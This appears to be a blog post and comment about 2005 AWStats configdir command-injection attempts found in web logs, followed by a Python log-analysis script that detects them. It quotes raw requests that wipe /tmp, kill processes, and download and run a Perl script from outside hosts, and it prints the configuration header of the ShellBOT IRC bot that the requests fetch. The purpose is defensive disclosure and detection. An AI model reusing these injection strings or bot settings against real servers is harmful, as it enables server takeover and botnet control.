I noticed the following entries in my log file:
66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
It appears that this person is attempting to have awstats download a perl script and have it executed on the web server. When I looked at the script that it is attempting to download, it attempts to connect to an IRC server and sends information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
I sent emails to the administrators of the various involved networks to have them stop this activity. Also, since the script writer is attempting to exploit a hole, I am assuming that there is, or was, one in awstats. I have left a message on the Awstats developer forum so they can look into this potential problem.
Update: This was fixed in the 6.4 version of awstats. If you are running an earlier version, you should update your awstats install.
This is part of the log:
219.166.34.48 - - [16/Nov/2005:02:12:35 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/mkaomike/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
This a.txt file has the header:
#!/usr/bin/perl
#
# ShellBOT - FBI TEAM Corporation
#
# 0ldW0lf - effbeeye81@aol.com
# - www.security.cnc.net
#
#
#
################ CONFIGURATION ###############################################################
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Process name that will show up in ps #
#----------------------------------------------################################################
my $linas_max='8'; # Avoids flooding :) after X lines #
#----------------------------------------------################################################
my $sleep='4'; # it sleeps X seconds #
##################### IRC #####################################################################
my @adms=("the-brain","adilcm","alalah"); # Administrator nick
#
#----------------------------------------------################################################
my @canais=("#kit *"); # If there is a password ("#channel :password") #
#----------------------------------------------################################################
my $nick='`alah'; # Bot nick. If it is already in use it will #
# appear with a random number at the end #
#----------------------------------------------################################################
my $ircname = 'super'; # User ID
#
#----------------------------------------------################################################
chop (my $realname = `uname -a`); # Full Name (output of uname -a, so the bot advertises the host's OS/kernel) #
#----------------------------------------------################################################
$servidor='213.150.48.155' unless $servidor; # IRC server to use if none is #
# given as an argument #
#----------------------------------------------################################################
my $porta='6667'; # IRC server port #
################ SHELL ACCESS #################################################################
my $secv = 1; # 1/0 to enable/disable shell access #
###############################################################################################
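The requests quoted in the post and in the comment above all share one shape: an awstats.pl hit whose configdir value starts with a "|" and carries a URL-encoded shell pipeline that fetches and runs a script. The following Python script is an added example (not code from the original post, the commenter, or the AWStats project) that walks an Apache combined log, flags that shape, decodes the injected commands, pulls out the download URLs, and records whether the probe actually reached awstats.pl (HTTP 200) or missed (404/403). The sample log embedded in it is constructed: the first three lines reproduce requests quoted on this page, joined back onto one line each, and the two benign requests are made up. The function names, the list of downloader commands in FETCH_RE, and the 200/404 interpretation are my assumptions, not anything the page states.

```python
import re
from urllib.parse import unquote

# Apache combined log line (the format both quoted logs use):
#   host ident user [time] "method target protocol" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Downloader commands the injected shell text typically uses to fetch the bot.
# This list is an assumption for the example; extend it for your environment.
FETCH_RE = re.compile(r'(?:wget|curl|fetch|lynx)\s+(?:-\S+\s+)*(\S+)')

# Constructed sample log. The first three lines reproduce requests quoted in the post
# and the comment (joined onto one line each); the last two are made-up benign hits.
SAMPLE_LOG = [
    '66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '219.166.34.48 - - [16/Nov/2005:02:12:35 +0100] "GET //awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20members.lycos.co.uk/mkaomike/a.txt;perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '10.0.0.5 - - [09/Jul/2005:00:05:00 -0700] "GET /awstats/awstats.pl?config=example.com&configdir=/etc/awstats HTTP/1.1" 200 12345 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [09/Jul/2005:00:05:01 -0700] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-log line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def extract_injection(target):
    """If the request target is an awstats.pl hit whose configdir value is a pipe
    injection, return the decoded shell text between the leading and trailing '|'.
    A plain directory value (no leading '|') or a non-awstats path returns None."""
    path, sep, query = target.partition('?')
    if not sep or not path.lower().endswith('awstats.pl'):
        return None
    for param in query.split('&'):
        name, _, value = param.partition('=')
        if name.lower() != 'configdir':
            continue
        decoded = unquote(value)          # %20 -> space, %7C -> '|', etc.
        if not decoded.startswith('|'):
            return None                   # ordinary configdir, e.g. /etc/awstats
        return decoded.strip('|')
    return None


def split_commands(shell_text):
    """Break the injected pipeline on ';' into trimmed commands, dropping empties."""
    return [c.strip() for c in shell_text.split(';') if c.strip()]


def download_urls(commands):
    """Return the argument of every downloader command (wget/curl/...) in the list."""
    return [m.group(1) for c in commands if (m := FETCH_RE.match(c))]


def analyse_log(lines):
    """Return one finding per awstats configdir injection seen in the log lines."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        shell = extract_injection(rec['target'])
        if shell is None:
            continue
        cmds = split_commands(shell)
        status = int(rec['status'])
        findings.append({
            'host': rec['host'],
            'path': rec['target'].partition('?')[0],
            'status': status,
            'commands': cmds,
            'downloads': download_urls(cmds),
            # 200 means awstats.pl answered at that path, so the payload reached the
            # script; 404/403 means the probe hit nothing. A 200 alone does not prove
            # the commands ran (a patched 6.4+ install answers 200 too), so treat it
            # as "check this host", not "compromised".
            'reached_script': status == 200,
        })
    return findings


if __name__ == '__main__':
    for f in analyse_log(SAMPLE_LOG):
        state = 'REACHED awstats.pl' if f['reached_script'] else 'probe missed (HTTP %d)' % f['status']
        print(f"{f['host']} {f['path']}: {state}; fetches {f['downloads']}")
        for c in f['commands']:
            print('    ' + c)
```

Run it against a real access_log by replacing SAMPLE_LOG with the file's lines; the benign configdir=/etc/awstats request shows why the check keys on the leading "|" after decoding rather than on the parameter name alone. When a finding has reached_script set, the next step is on the host itself: look in /tmp for the fetched script, for perl processes whose name has been rewritten to look like httpd (the $processo trick in the bot header above), and for outbound connections to port 6667.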